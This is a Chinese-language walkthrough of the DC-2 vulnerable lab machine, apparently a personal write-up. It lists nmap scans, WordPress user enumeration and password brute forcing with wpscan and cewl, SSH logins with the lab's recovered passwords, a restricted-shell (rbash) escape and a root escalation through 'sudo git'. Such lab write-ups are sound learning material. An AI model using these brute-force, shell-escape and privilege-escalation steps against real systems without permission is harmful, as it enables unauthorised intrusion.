实验环境
- Vmware workstation
- kali2020
- DC-2
- DC-2靶机网卡和kali是一样的
- kali 的ip地址:192.168.6.129
主机发现
第一种方法:使用VMware去查看DC-2靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。
nmap -sP 192.168.6.0/24
发现靶机IP地址为:192.168.6.132
信息收集
端口扫描
命令1:nmap -A -T4 -p- 192.168.6.132
命令2:nmap -sV 192.168.6.132
开放了80和7744端口
访问一下,发现无法访问
修改攻击机的hosts文件,将以下内容写入
192.168.6.132 DC-2
发现还是不让我访问,我就修改了Windows下的hosts
然后就能访问了
发现flag1
有关键字cewl,字面意思大概就是要爆破出用户名和密码了
查看指纹信息,知道是wordpressCMS
利用wpscan扫一下用户名
wpscan --url http://dc-2/ -e u
将用户名存到文件
使用cewl生成密码
cewl -w pass.txt http://dc-2
攻击
爆破
wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force
出来了
后台地址是在首页地址后加wp-login.php
用jerry登录发现flag2,tom页面没发现什么
尝试ssh远程登录
我们尝试用tom用户进行登录ssh服务,密码:parturient
用户:jerry,密码:adipiscing
命令:ssh tom@192.168.6.132 -p 7744
输入命令,发现受rbash的限
突破rbash
BASH_CMDS[a]=/bin/sh;a
/bin/bash
使用并添加环境变量
export PATH=$PATH:/bin/
他说在Jerry里,那我们切换
有点白痴,居然cd /了
说不是最终的flag,提示git
提权
sudo git -p help
!/bin/bash
即可登录root用户
去根目录找
结束。